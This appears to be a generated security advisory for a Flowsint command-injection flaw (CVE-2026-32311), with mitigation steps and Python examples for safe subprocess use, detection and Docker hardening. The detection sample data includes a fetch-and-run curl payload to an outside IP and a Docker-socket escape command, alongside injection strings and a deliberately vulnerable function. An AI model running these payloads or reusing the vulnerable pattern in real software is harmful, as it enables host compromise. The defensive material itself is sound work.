CVE-2026-32311 Overview
CVE-2026-32311 is a critical command injection vulnerability in Flowsint, an open-source OSINT (Open Source Intelligence) graph exploration tool used for cybersecurity investigations, transparency research, and verification workflows. The vulnerability exists in the org_to_asn transformer functionality, which fails to properly sanitize user-controlled input before executing shell commands. A remote attacker can exploit this flaw to execute arbitrary operating system commands as root on the host machine through shell metacharacter injection combined with a Docker container escape technique.
Critical Impact
Remote attackers can achieve full system compromise by executing arbitrary commands as root on the host machine, bypassing Docker container isolation through the vulnerable transformer functionality.
Affected Products
- Reconurge Flowsint (versions prior to commit b52cbbb904c8013b74308d58af88bc7dbb1b055c)
Discovery Timeline
- 2026-04-20 - CVE-2026-32311 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2026-32311
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists within Flowsint's transformer architecture, specifically in the org_to_asn transform function that processes organization nodes within investigation sketches.
Flowsint allows users to create investigations containing sketches: user-controlled graphs composed of nodes and relationships. These nodes store OSINT target information such as usernames, websites, and organizational data. When a user triggers the org_to_asn transformer on an organization node, the application passes node data to a system shell command without adequate sanitization of shell metacharacters.
The attack chain is particularly severe because it not only achieves command injection but also facilitates a Docker container escape, allowing attackers to break out of the containerized environment and execute commands directly on the underlying host system with root privileges.
Root Cause
The root cause of CVE-2026-32311 is the lack of input validation and sanitization in the org_to_asn transformer when constructing shell commands. User-supplied data from organization nodes is concatenated directly into command strings without escaping or filtering shell metacharacters (such as ;, |, &, $(), and backticks). This allows attackers to inject additional commands that execute with the privileges of the running process.
The container escape component suggests that the Docker configuration grants excessive privileges to the container, potentially through privileged mode, host volume mounts, or exposed Docker socket, enabling attackers to pivot from container compromise to full host control.
Attack Vector
The attack is network-accessible and requires no authentication and no interaction from a victim user. An attacker exploits the vulnerability by:
- Creating an investigation within Flowsint
- Adding a sketch containing an organization node with malicious shell metacharacters in the node data
- Triggering the org_to_asn transformer on the crafted organization node
- Causing the injected commands to execute within the container context
- Leveraging container misconfiguration to escape to the host system and execute commands as root
The vulnerability mechanism involves shell metacharacter injection in the transformer's command construction. When the org_to_asn transformer processes an organization node, it constructs a shell command using the node's data. By including shell metacharacters such as $(command) or ; command ; in the organization name or related fields, an attacker can break out of the intended command context and execute arbitrary code. For detailed technical analysis, refer to the GitHub Security Advisory GHSA-9g44-8xv2-f2m9.
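The concatenation pattern described in the root-cause and attack-vector text, beside the two fixes a reviewer would ask for, as an added Python example. This is not Flowsint's code and does not reproduce the real transformer, the tool it invokes, or its field names (the language is chosen for illustration, not asserted to match Flowsint's implementation). `echo` stands in for the lookup command so the block runs offline and harmlessly, the two payloads are constructed to match the `; command` and `$(command)` shapes named above, and the allowlist regex is an assumed policy.

```python
"""Illustrative CWE-78 pattern for an org_to_asn-style transformer and its fix.

Added example, not Flowsint's code: the real transformer, the tool it
invokes and its field names are not reproduced here. `echo` stands in for
the lookup command so the example runs offline and harmlessly.
"""
import re
import shlex
import subprocess

# Allowlist for an organization name (assumed policy, tune for your data):
# letters, digits, space, dot, comma, apostrophe and hyphen. Everything the
# shell treats specially (; | & $ ` ( ) < > quotes, newline) is rejected.
ORG_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 .,'\-]{0,127}")

# Constructed payloads in the two shapes the advisory text names.
PAYLOAD_SEMICOLON = "acme; echo INJECTED"
PAYLOAD_SUBSHELL = "acme $(echo INJECTED)"


def vulnerable_org_to_asn(org_name: str) -> str:
    """VULNERABLE: node data is concatenated into a string handed to /bin/sh."""
    cmd = f"echo {org_name}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_org_name(org_name: str) -> str:
    """Reject anything outside the allowlist before it reaches a command."""
    if not ORG_NAME_RE.fullmatch(org_name):
        raise ValueError(f"organization name rejected: {org_name!r}")
    return org_name


def hardened_org_to_asn(org_name: str, validate: bool = True) -> str:
    """FIXED: argv list with shell=False, so the name is one literal argument.

    validate=False shows that the argv form alone already defeats injection;
    the allowlist is defence in depth, not the primary control.
    """
    if validate:
        org_name = validate_org_name(org_name)
    argv = ["echo", org_name]
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, check=True).stdout


def quoted_org_to_asn(org_name: str) -> str:
    """Fallback when a shell string is unavoidable: shlex.quote turns the
    value into a single shell word. Weaker than argv because it relies on
    every layer the string crosses honouring POSIX quoting."""
    cmd = f"echo {shlex.quote(org_name)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_rejected(org_name: str) -> bool:
    """True when the allowlist refuses the value."""
    try:
        validate_org_name(org_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_org_to_asn(PAYLOAD_SEMICOLON)))
    print("hardened  :", repr(hardened_org_to_asn(PAYLOAD_SEMICOLON, validate=False)))
    print("quoted    :", repr(quoted_org_to_asn(PAYLOAD_SUBSHELL)))
    print("rejected  :", is_rejected(PAYLOAD_SUBSHELL))
```

The vulnerable function prints `acme` and then `INJECTED` on its own line because `/bin/sh` parsed the `;`; the argv form prints the whole value as one literal, and the allowlist refuses both payloads before any command runs.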
Detection Methods for CVE-2026-32311
Indicators of Compromise
- Unexpected process spawning from the Flowsint application container, particularly shells (/bin/sh, /bin/bash) or system utilities (wget, curl, nc)
- Organization nodes containing shell metacharacters or encoded command sequences in investigation data
- Unusual network connections originating from the Flowsint container to external command and control infrastructure
- Evidence of Docker socket access or privilege escalation attempts within container logs
Detection Strategies
- Monitor application logs for org_to_asn transformer executions with suspicious organization names containing special characters
- Implement behavioral analysis to detect anomalous process trees originating from the Flowsint container
- Deploy runtime container security monitoring to identify container escape attempts and unexpected privilege escalation
- Use web application firewalls to inspect and block requests containing shell metacharacters targeting the transformer endpoints; treat this as a stopgap, since legitimate organization names can contain characters such as & or apostrophes and a blanket rule will produce false positives
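The indicators and strategies above, run over sample data, as an added Python example. It is not part of Flowsint or of any runtime-security product: the node-export layout, the process-event layout, the `flowsint` container-name prefix and every record in `NODES` and `EVENTS` are constructed for the example.

```python
"""Added detection example, not part of Flowsint: scans exported sketch
nodes and a process-event feed for the indicators listed above.

Assumptions: the node and event record layouts are invented for the example;
real exports and runtime sensors have their own. All sample data is constructed.
"""
import re
from urllib.parse import unquote

# Characters that let a value break out of a shell command; `$` and the
# backtick cover the $(...) and `...` substitution forms named in the text.
SHELL_META_RE = re.compile(r"[;&|`$<>\n]")

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
NET_TOOLS = {"wget", "curl", "nc", "ncat", "socat"}
CONTAINER_PREFIX = "flowsint"  # assumed container naming

# Constructed sketch export: one clean org node, two crafted ones, and a
# non-organization node that org_to_asn never processes.
NODES = [
    {"id": "n1", "type": "organization", "name": "Acme Corp"},
    {"id": "n2", "type": "organization",
     "name": "acme; curl http://198.51.100.7/x | sh"},
    {"id": "n3", "type": "organization", "name": "acme%24%28id%29"},  # URL-encoded $(id)
    {"id": "n4", "type": "website", "name": "example.com; id"},
]

# Constructed process events, shaped like what a runtime sensor might emit.
EVENTS = [
    {"pid": 101, "container": "flowsint-backend", "parent": "python3",
     "proc": "python3", "cmdline": "python3 -m celery worker"},
    {"pid": 102, "container": "flowsint-backend", "parent": "python3",
     "proc": "sh", "cmdline": "sh -c 'echo acme; curl http://198.51.100.7/x | sh'"},
    {"pid": 103, "container": "flowsint-backend", "parent": "sh",
     "proc": "curl", "cmdline": "curl http://198.51.100.7/x"},
    {"pid": 104, "container": "flowsint-backend", "parent": "sh",
     "proc": "docker", "cmdline": "docker -H unix:///var/run/docker.sock run --privileged alpine"},
    {"pid": 105, "container": "neo4j", "parent": "java",
     "proc": "sh", "cmdline": "sh -c 'ls /data'"},
]


def flag_suspicious_nodes(nodes):
    """Return (id, name) for organization nodes whose name, after URL
    decoding, contains shell metacharacters (covers encoded sequences)."""
    hits = []
    for node in nodes:
        if node.get("type") != "organization":
            continue
        name = node.get("name", "")
        if SHELL_META_RE.search(unquote(name)):
            hits.append((node["id"], name))
    return hits


def flag_suspicious_processes(events):
    """Return (pid, reason) for processes inside Flowsint containers that
    match the indicators: shells or download tools spawned under the
    application, and any use of the Docker client or socket."""
    hits = []
    for ev in events:
        if not ev["container"].startswith(CONTAINER_PREFIX):
            continue
        proc, parent = ev["proc"], ev["parent"]
        if proc in SHELLS or proc in NET_TOOLS:
            hits.append((ev["pid"], f"{proc} spawned by {parent}"))
        elif proc == "docker" or "docker.sock" in ev.get("cmdline", ""):
            hits.append((ev["pid"], "Docker client or socket use inside container"))
    return hits


if __name__ == "__main__":
    for node_id, name in flag_suspicious_nodes(NODES):
        print(f"node {node_id}: {name!r}")
    for pid, reason in flag_suspicious_processes(EVENTS):
        print(f"pid {pid}: {reason}")
```

The node scan decodes before matching so that `%24%28` is caught as `$(`; the process scan deliberately flags a plain `sh` under the application process, because for this bug a shell spawned by the transformer is the injection happening, not background noise.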
Monitoring Recommendations
- Enable comprehensive logging for all transformer operations within Flowsint
- Configure container runtime security tools to alert on any processes spawning outside the expected application behavior
- Implement network segmentation and monitor for lateral movement attempts from the Flowsint host
- Review Docker daemon logs for container escape indicators and privileged operation attempts
How to Mitigate CVE-2026-32311
Immediate Actions Required
- Update Flowsint immediately to a build that includes commit b52cbbb904c8013b74308d58af88bc7dbb1b055c
- If immediate patching is not possible, disable or restrict access to the org_to_asn transformer functionality
- Review existing investigations and sketches for any suspicious organization nodes containing shell metacharacters
- Audit Docker container configurations to remove privileged access and unnecessary capabilities
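The configuration audit in the last step, as an added Python example that reads `docker inspect` output and reports the settings that let a container-level command injection reach the host (privileged mode, added capabilities, host mounts, the Docker socket, a root user). It is not Flowsint's code; `WEAK` and `HARDENED` are constructed, trimmed excerpts shaped like real `docker inspect <container>` JSON, carrying only the fields the audit reads.

```python
"""Added example, not Flowsint's code: audit `docker inspect` output for the
misconfigurations that turn a container-level command injection into host
compromise.

WEAK and HARDENED are constructed, trimmed excerpts shaped like real
`docker inspect <container>` JSON; only the fields the audit reads are present.
"""
import json

DOCKER_SOCK = "/var/run/docker.sock"
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/lib/docker"}


def audit_container(inspect_obj) -> list:
    """Return sorted, de-duplicated findings for one inspected container.
    Accepts the list `docker inspect` prints or a single container dict."""
    cfg = inspect_obj[0] if isinstance(inspect_obj, list) else inspect_obj
    hc = cfg.get("HostConfig", {})
    findings = set()

    if hc.get("Privileged"):
        findings.add("Privileged=true (all capabilities, raw device access)")
    for cap in hc.get("CapAdd") or []:
        findings.add(f"CapAdd={cap}")
    if "ALL" not in (hc.get("CapDrop") or []):
        findings.add("CapDrop does not include ALL")
    if hc.get("PidMode") == "host":
        findings.add("PidMode=host")
    if hc.get("NetworkMode") == "host":
        findings.add("NetworkMode=host")
    if not any(o.startswith("no-new-privileges") for o in hc.get("SecurityOpt") or []):
        findings.add("no-new-privileges not set")
    if not hc.get("ReadonlyRootfs"):
        findings.add("root filesystem writable")
    if not cfg.get("Config", {}).get("User"):
        findings.add("runs as root (Config.User empty)")

    # Bind sources appear both as HostConfig.Binds strings ("src:dst[:opts]")
    # and as Mounts objects; check both so neither form is missed.
    sources = [b.split(":")[0] for b in hc.get("Binds") or []]
    sources += [m.get("Source", "") for m in cfg.get("Mounts") or []
                if m.get("Type") == "bind"]
    for src in sources:
        if src == DOCKER_SOCK:
            findings.add("Docker socket mounted")
        elif src in SENSITIVE_HOST_PATHS:
            findings.add(f"sensitive host path mounted: {src}")
    return sorted(findings)


def audit_inspect_json(text: str) -> list:
    """Same audit over the raw JSON text that `docker inspect` prints."""
    return audit_container(json.loads(text))


# Constructed: a deployment that would let an injected command take the host.
WEAK = [{
    "Config": {"User": ""},
    "HostConfig": {
        "Privileged": True, "CapAdd": ["SYS_ADMIN"], "CapDrop": None,
        "PidMode": "", "NetworkMode": "bridge", "SecurityOpt": None,
        "ReadonlyRootfs": False,
        "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "/:/host"],
    },
    "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True},
        {"Type": "bind", "Source": "/", "Destination": "/host", "RW": True},
    ],
}]

# Constructed: the same container after hardening (non-root uid, all caps
# dropped, read-only rootfs, internal network, a named volume instead of binds).
HARDENED = [{
    "Config": {"User": "10001:10001"},
    "HostConfig": {
        "Privileged": False, "CapAdd": None, "CapDrop": ["ALL"],
        "PidMode": "", "NetworkMode": "flowsint-internal",
        "SecurityOpt": ["no-new-privileges:true"], "ReadonlyRootfs": True,
        "Binds": None,
    },
    "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/flowsint_data/_data",
                "Destination": "/data", "RW": True}],
}]
WEAK_JSON = json.dumps(WEAK)

if __name__ == "__main__":
    for finding in audit_container(WEAK):
        print("WEAK:", finding)
    print("HARDENED:", audit_container(HARDENED) or "no findings")
```

On a live host the input is `docker inspect <container>` piped to `audit_inspect_json`; a container that mounts the Docker socket or `/` is one where a command injection is already a host compromise, whatever else the audit reports.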
Patch Information
The vulnerability has been addressed in commit b52cbbb904c8013b74308d58af88bc7dbb1b055c. This commit removes or refactors the vulnerable code that allowed unsanitized input to reach shell command execution. Organizations should update their Flowsint installations to include this commit. For detailed patch information, see the GitHub Commit Update and the GitHub Security Advisory GHSA-9g44-8xv2-f2m9.
Workarounds
- Restrict network access to the Flowsint application to trusted users and IP ranges only
- Disable the org_to_asn transformer if it is not required for your investigation workflows
- Run the Flowsint container with minimal privileges, removing --privileged flag and dropping unnecessary Linux capabilities
- Implement network-level controls to prevent the container from initiating outbound connections to untrusted destinations
# Docker security hardening example
# Run the Flowsint container with reduced privileges. flowsint:latest and the
# uid are placeholders; adjust them to your image and the user it expects.
# An --internal network has no route beyond the host, so an injected command
# cannot reach external infrastructure; /tmp is given a tmpfs because the
# read-only root filesystem otherwise leaves no scratch space.
docker network create --internal flowsint-internal
docker run --rm \
  --user 10001:10001 \
  --cap-drop=ALL \
  --security-opt=no-new-privileges:true \
  --read-only \
  --tmpfs /tmp \
  --network=flowsint-internal \
  flowsint:latest
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.